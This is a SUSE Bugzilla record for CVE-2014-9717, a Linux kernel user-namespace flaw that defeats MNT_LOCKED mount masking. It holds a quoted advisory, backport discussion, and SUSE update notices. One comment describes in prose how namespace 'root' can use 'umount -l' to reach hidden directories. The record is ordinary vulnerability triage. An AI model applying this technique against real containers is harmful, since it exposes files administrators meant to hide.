Bugzilla – Bug 928547
VUL-1: CVE-2014-9717: kernel: USERNS allows circumventing MNT_LOCKED
Last modified: 2017-09-20 14:52:41 UTC
Another obscure bug: http://www.openwall.com/lists/oss-security/2015/04/17/4 > Date: Fri, 17 Apr 2015 11:44:14 -0400 > From: Eric Windisch <eric@...disch.us> > To: oss-security@...ts.openwall.com > Cc: cve-assign@...re.org > Subject: USERNS allows circumventing MNT_LOCKED > > In October 2014, Andrey Vagin reported[1] to the Linux Containers list that > it would be possible to use user namespaces to circumvent MNT_LOCKED and > allow unprivileged users to access the directory structure underneath of > mounts. A PoC was also produced and is public. > > Patches are now available and proposed to Linus[2]. > > This may not simply be information disclosure, but containerized > environments may through chroot and mount namespaces mask directory > structures as read-only or inaccessible via the use of bind-mounts. Such > read-only masking may be circumvented by this vulnerability on systems > where these directories are not otherwise protected by MAC (i.e. SELinux or > AppArmor). > > Regards, > Eric Windisch > > [1] https://groups.google.com/forum/#!topic/linux.kernel/HnegnbXk0Vs > [2] http://www.spinics.net/lists/linux-containers/msg30786.html The mainline merge commit is 8f502d5b9e3362971f58dad5d468f070340336e1 References: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9717 http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-9717.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9717
bugbot adjusting priority
will take care of this.
Jiri, Many of those patches have Cc: stable@, but I can only see cd4a40174b71 mnt: Fail collect_mounts when applied to unmounted mounts in the 3.12-stable series. Have you looked at the others and decided they are not appropriate for -stable or is there some other reason that only one of those was backported?
(In reply to Miklos Szeredi from comment #5) > Many of those patches have Cc: stable@, but I can only see > > cd4a40174b71 mnt: Fail collect_mounts when applied to unmounted mounts > > in the 3.12-stable series. Yes, I was explicitly asked to merge that one: http://comments.gmane.org/gmane.linux.kernel.stable/135336 > Have you looked at the others and decided they are not appropriate for > -stable or is there some other reason that only one of those was backported? No, I haven't looked at them all yet. But at least this one: 820f9f147dcc fs_pin: Allow for the possibility that m_list or s_list go unused. is not needed apparently: "The fact most of these changes depends on fs_pin likely limits how far they may be bsckported" and "Yes. This one isn't harmful back at 3.16.". See the link above. So if you provide me with SHAs I should take to 3.12, I will :).
Okay, I'll have a look then.
I don't think that we can reasonably fix this "issue". There is a patch which fixes a problem that leads to a kernel panic. That addresses the "PoC [that] was also produced and is public." The more general problem is that if a sysadmin provides some filesystem to a user-namespace container and tries to hide parts of it by mounting something over those parts, then this is ineffective. The "root" in the user namespace can "cd" into that filesystem, then use "umount -l" to unmount the filesystem and everything mounted on it. Then it will be able to "cd" around the filesystem, including into the "hidden" parts. The changes required to "fix" this are very invasive and don't think the problem scenario justifies those changes. Possible a tech-note advising customers "Mounting on filesystem over another is not a reliable way to hide files from a user which would otherwise have access to those files" I have submitetd the crash-fix patch Commit: 8486a7882b5b ("mnt: Move the clear of MNT_LOCKED from copy_tree to it's callers.") but I don't think any other code changes are justified.
... and the original report says: > Such read-only masking may be circumvented by this vulnerability on > systems where these directories are not otherwise protected by MAC > (i.e. SELinux or AppArmor). which we probably should say in our tech-note too, but formulated a bit more active and say that people should do MAC if they need proper protection... sec-team can complain if they're still not atisfied with the solution. Btw, any info on how RH have fixed this?
(In reply to Borislav Petkov from comment #11) This is an area where vulnerabilities pop up all the time currently. I think we can leave it as it is. Anyone using a setup like this needs to be aware that additional measures are necessary to keep it safe. RH lists itself as not affected by this.
SUSE-SU-2016:1690-1: An update that solves 29 vulnerabilities and has 89 fixes is now available. Category: security (important) Bug References: 676471,880007,889207,899908,903279,928547,931448,940413,943989,944309,945345,947337,953233,954847,956491,956852,957805,957986,960857,962336,962846,962872,963193,963572,963762,964461,964727,965319,966054,966245,966573,966831,967251,967292,967299,967903,968010,968141,968448,968512,968667,968670,968687,968812,968813,969439,969571,969655,969690,969735,969992,969993,970062,970114,970504,970506,970604,970892,970909,970911,970948,970955,970956,970958,970970,971049,971124,971125,971126,971159,971170,971360,971600,971628,971947,972003,972174,972844,972891,972933,972951,973378,973556,973570,973855,974165,974308,974406,974418,974646,975371,975488,975533,975945,976739,976868,977582,977685,978401,978822,979169,979213,979419,979485,979548,979867,979879,980348,980371,981143,981344,982354,982698,983213,983318,983394,983904,984456 CVE References: CVE-2014-9717,CVE-2015-8816,CVE-2015-8845,CVE-2016-0758,CVE-2016-2053,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3136,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-3672,CVE-2016-3689,CVE-2016-3951,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-5244 Sources used: SUSE Linux Enterprise Workstation Extension 12 (src): kernel-default-3.12.60-52.49.1 SUSE Linux Enterprise Software Development Kit 12 (src): kernel-docs-3.12.60-52.49.3, kernel-obs-build-3.12.60-52.49.1 SUSE Linux Enterprise Server 12 (src): kernel-default-3.12.60-52.49.1, kernel-source-3.12.60-52.49.1, kernel-syms-3.12.60-52.49.1, kernel-xen-3.12.60-52.49.1 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.60-52.49.1 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12_Update_14-1-2.1 SUSE Linux Enterprise Desktop 12 (src): kernel-default-3.12.60-52.49.1, kernel-source-3.12.60-52.49.1, kernel-syms-3.12.60-52.49.1, kernel-xen-3.12.60-52.49.1
SUSE-SU-2016:1696-1: An update that solves 16 vulnerabilities and has 66 fixes is now available. Category: security (important) Bug References: 662458,676471,889207,897662,899908,903279,908151,928547,931448,937086,940413,942262,943989,944309,945345,951844,953233,957805,958390,959514,960857,962336,962846,962872,963572,964461,964727,965319,966054,966573,967640,968497,968687,968812,968813,969016,970604,970609,970892,970911,970948,970955,970956,970958,970970,971049,971124,971126,971159,971170,971600,971628,971793,971947,972003,972068,972174,972780,972844,972891,972951,973378,973556,973855,974418,974646,974692,975371,975488,975772,975945,976739,976821,976868,977582,977685,978401,978527,978822,979213,979347,983143 CVE References: CVE-2014-9717,CVE-2016-1583,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2847,CVE-2016-3134,CVE-2016-3136,CVE-2016-3137,CVE-2016-3138,CVE-2016-3140,CVE-2016-3689,CVE-2016-3951,CVE-2016-4482,CVE-2016-4486,CVE-2016-4569 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP1 (src): kernel-default-3.12.59-60.41.2 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): kernel-docs-3.12.59-60.41.8, kernel-obs-build-3.12.59-60.41.2 SUSE Linux Enterprise Server 12-SP1 (src): kernel-default-3.12.59-60.41.2, kernel-source-3.12.59-60.41.2, kernel-syms-3.12.59-60.41.1, kernel-xen-3.12.59-60.41.2 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.59-60.41.2 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12-SP1_Update_5-1-2.1 SUSE Linux Enterprise Desktop 12-SP1 (src): kernel-default-3.12.59-60.41.2, kernel-source-3.12.59-60.41.2, kernel-syms-3.12.59-60.41.1, kernel-xen-3.12.59-60.41.2
SUSE-SU-2016:1937-1: An update that solves 24 vulnerabilities and has 76 fixes is now available. Category: security (important) Bug References: 662458,676471,897662,928547,944309,945345,947337,950998,951844,953048,953233,954847,956491,957805,957986,957990,958390,958463,960857,962742,962846,963762,964727,965087,966245,967640,968667,969016,970114,970506,970604,970609,970948,971049,971770,971947,972124,972933,973378,973499,973570,974165,974308,974620,974646,974692,975533,975772,975788,976739,976821,976868,977417,977582,977685,978401,978469,978527,978822,979169,979213,979347,979419,979485,979489,979521,979548,979867,979879,979922,980246,980348,980371,980706,981038,981143,981344,982282,982354,982544,982698,983143,983213,983318,983394,983721,983904,983977,984148,984456,984755,985232,985978,986362,986569,986572,986811,988215,988498,988552 CVE References: CVE-2014-9717,CVE-2014-9904,CVE-2015-7833,CVE-2015-8539,CVE-2015-8551,CVE-2015-8552,CVE-2015-8845,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2847,CVE-2016-3672,CVE-2016-3707,CVE-2016-4470,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-4997,CVE-2016-5244,CVE-2016-5828,CVE-2016-5829 Sources used: SUSE Linux Enterprise Real Time Extension 12-SP1 (src): kernel-compute-3.12.61-60.18.1, kernel-compute_debug-3.12.61-60.18.1, kernel-rt-3.12.61-60.18.1, kernel-rt_debug-3.12.61-60.18.1, kernel-source-rt-3.12.61-60.18.1, kernel-syms-rt-3.12.61-60.18.1
released